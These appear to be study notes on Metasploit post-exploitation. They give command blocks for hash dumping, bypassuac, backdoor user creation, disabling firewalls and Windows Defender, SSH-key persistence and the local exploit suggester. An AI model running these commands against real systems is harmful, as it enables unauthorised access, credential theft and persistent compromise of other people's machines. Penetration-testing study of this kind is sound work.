Remote Exploitation - using exploit to gain access to a computer Local Exploitation - exploiting from within compromised computer ## What can one do? - Turn off firewall, AV, rollback windows defender. start RDP etc. ## Linux Highest privilege user is 'root' ## Windows - Privilege escalation, "System" is the highest, IEUser not there yet - Get metapreter shell -> run exploits - Rollback win defender - can use meterpreter or shell depending on requirements - use bypassuac to launch a new meterpreter session with admin access ```shell # after getting system access, one can run windows/gather/hash/dump # this is similar to linux shadow file # note LM hash is deprecated, if cracked, is empty string # NTLM hash is the one that is currently used creds # see exposed credentials again run winenum # windows enumeration script, generate enumerated .txt file on your attack computer ``` ## Manual Backdoor Creation ```shell shell # if in meterpreter adduser badguy id badguy usermod -aG sudo badguy id badguy # check if permissions upgraded ``` ## Common Post Exploit Modules ```shell checkvm iptables_removal # disable firewall enum_configs # enumerate config files and save to our machine sshkey_persistence # add ssh keys to all user on target machine ``` ## Msfconsole - Local Exploit Suggester ```shell search local_exploit_suggester # run this once an established meterpreter session is up, upgrade shell if not set session 1 run # local_exploit_suggester will check against exploit list show payloads set payload # try to use x86 payloads first for backward compatibility options # always check options to see what fields are required run background sessions # see the new session available ``` Common Troubleshoot "Exploited completed, but no session was created." - Payload doesn't work, try another 1 "/tmp i smounted nosuid" - default linux privilege escalation prevention measure ```shell search type:post linux # over 500 post modules, be specific ```